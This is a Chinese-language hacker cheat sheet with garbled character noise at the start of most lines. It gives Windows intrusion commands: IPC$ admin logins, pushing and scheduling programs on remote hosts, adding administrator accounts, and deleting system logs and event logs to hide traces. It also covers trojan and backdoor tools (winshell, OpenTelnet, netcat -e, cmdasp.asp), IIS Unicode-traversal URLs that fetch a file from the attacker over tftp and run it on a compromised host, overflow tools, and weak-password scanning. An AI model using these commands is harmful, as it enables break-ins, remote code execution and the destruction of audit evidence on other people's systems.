网管和黑客都必须知道的命令
}6*+>? 常用的几条NET命令:
]%>7OH' |qnAqzK| (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
5|z>_f.^pS &@p _g8r# (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
0}tf*M+a aDceOhfx (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
6O"?wN%$ |Ii[WfFA|J (查看远程主机时间) net time \\IP地址
Aru=f~! FOV%\=Hl (定时启动某个程序) at \\IP地址 02:18 readme.exe
C-O~Oi l <#/r.}.x (查看共享) net view \\IP地址
(&t741DN| #;~`+[y?\ (查看netbios工作组列表) nbtstat -A IP地址
?-C=_eZJ g?&_5)& (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
1?%Q"*Y& ;n]GHqzY_ (这两条把自己增加到管理员组): net user 用户名 密码 /add
x8x8T$ #[ZToE4 net localgroup Administrators 用户名 /add
Zq1ZrwPF B?n
6o|8 (断开连接) net use \\IP地址\ipc$ /delete
{| ~ Kcf1$`F24 扫尾:
J< Ljg<t+ *9Ta0e* del C:\winnt\system32\logfiles\*.*
IC"lsNq52 {x_SnZz & del C:\winnt\ssytem32\config\*.evt
#@%DY*w]v iXLODuI del C:\winnt\system32\dtclog\*.*
kd55y i82sMN1jl7 del C:\winnt\system32\*.log
9BR/zQ2 R. :~e del C:\winnt\system32\*.txt
$.HZz ,'!x9 ` del C:\winnt\*.txt
Rn?Yz^
1q 3lr9nBR del C:\winnt\*.log
\"k[y+O],4 I
"Qf};n 一、netsvc.exe
|p_\pa1&
^V6cx2M 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
7 6 nrDE \EI<1B netsvc /list \\IP地址
J34/rL/s 3QSA| netsvc schedule \\IP地址 /query
.h c-uaL V Ioqn$ netsvc \\IP地址 schedule /start
R%Xhdcn7 ={~?O&Jh 二、OpenTelnet.exe
X;:qnnO :)JIKP%$\) 远程启动主机的Telnet服务,并绑定端口到7878,例如:
C?dQ
QB$ Odn`q= OpenTelnet \\IP地址 用户名 密码 1 7878
)T0%<(J \iL{q^Im 然后就可以telnet到主机的7878端口,进入DOS方式下:
py|ORVN(Z z3Id8G&> telnet IP地址 7878
=#=<%HPT @kh:o\ 三、winshell.exe
&<dC3o! )}!Z^ND* 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
oz8z%*9( #Sg< 9xsW p Path (查看winshell主程序的路径信息)
[pY1\$, dMd2a4 b reBoot (重新启动机器)
b6(LoN. h95a61a,Vy d shutDown (关闭机器)
W0-KFo.' 1 sJtkge: s Shell (执行后你就会看到可爱的“C:\>”)
wmV7g7t6 O~P1d&:L x eXit (退出本次登录会话,此命令并不终止winshell的运行)
,]Gi942 };{Qx CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
U~CG(9 ]9A@iA 四、3389登陆器,GUI方式登录远程主机的
SHow~wxw vQH6CB" 五、elsave.exe
C\`*_t |(eRv?Qy@ 事件日志清除工具
simD<&p !&(^R<-id elsave -s \\IP地址 -l "application" -C
!#[B#DZc( rd_!'pG elsave -s \\IP地址 -l "system" -C
1
lZRi-P [LF<aR5 elsave -s \\IP地址 -l "security" -C
^QG;:.3v h4,g pV>t 执行后成功清除应用程序日志,系统日志,安全日志
q9
SV<qg WY& [%r 六、hbulot.exe
8el\M/u{ uD=FTx 开启win2kserver和winxp的3389服务
*`]#ntz9 x*#9\*@EI hbulot [/r]
N\{{:<Cp\ <sncW>?!~ 使用/r表示安装完成后自动重起目标使设置生效。
?y/LMja L#|6Lnp^ 七、nc.exe(netcat.exe)
^{}$o#iof XM#xxf* Y 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
fW3awR{ ~bD'QMk 想要连接到某处: nc [-options] hostname port[s] [ports] ...
?mi1PNps# t,]E5,1 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
p)e?0m26 .P:mYC 参数:
w<|Qezi3
w Z1dLC'/b] -e prog 程序重定向,一旦连接,就执行 [危险!!]
VN/v] huat,zLS -g gateway source-routing hop point[s], up to 8
%G`GdG}T ^'G,sZ6'Nh -G num source-routing pointer: 4, 8, 12, ...
Vi*HG &DD o4t6NDa -h 帮助信息
*Y]()#?Gr .,*68S0k7 -i secs 延时的间隔
UFl+|wf c'}dsq\ -l 监听模式,用于入站连接
dd-`/A@ !Y,*Zc$R -n 指定数字的IP地址,不能用hostname
WKvG|YRDq zL@FN sYVM -o file 记录16进制的传输
"i^<
H `^mY*Cb e -p port 本地端口号
BM>'w,$KL dWi:V7t+ -r 任意指定本地及远程端口
[/Vi*Z oYmLJzCf -s addr 本地源地址
78UE?) X" %0Mvd;#[ -u UDP模式
pd\x^F`sk. _`~\zzUZ -v 详细输出——用两个-v可得到更详细的内容
ZnNl3MKV x T8pwTO -w secs timeout的时间
(x!Tb2mlk ;r3Xh)k; -z 将输入输出关掉——用于扫描时
<$@*'i^7Ez 八、TFTPD32.EXE
U][\|8i oYR OGU 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
[))TL h%PbM`:}6 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
~YQH] ZcE:r+ 然后可以直接令文件运行:
EQ%,IK/ > }fw7 X http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
|kc#=b@l sNHxUI 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
x_oiPu.V ?B['8ju 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
lN~V1(1B $'%.w|MJp 一、一 Xscan命令行运行参数说明:
7GDrH/yK jnIf(a 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
%f1>cO9[ .H#<yPty 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
UAEu.AT UlQS]f~ xscan -file <主机列表文件名> <检测项目> [其他选项]
tDQuimYu7 ]9PQKC2& 其中<检测项目> 含义如下:
Me2qOc^Z- sL!+&Id| -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
',bSJ4)Y zPc kM) -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
2Fc>6]:* SUN!8
qFA -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
cnraNq1 EPiZe- -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
jt`\n1q) _%]x-yH!@ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
@;t6Slc"~ [ f;o3 [其他选项] 含义如下:
*Y`c.n" vhd +A -v: 显示详细扫描进度
B>UF dj]-
{,+MaH -p: 跳过Ping不通的主机
B1i&HoGbz "?v{?,@ -o: 跳过没有检测到开放端口的主机
%4,v2K ^_c6Op<F -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10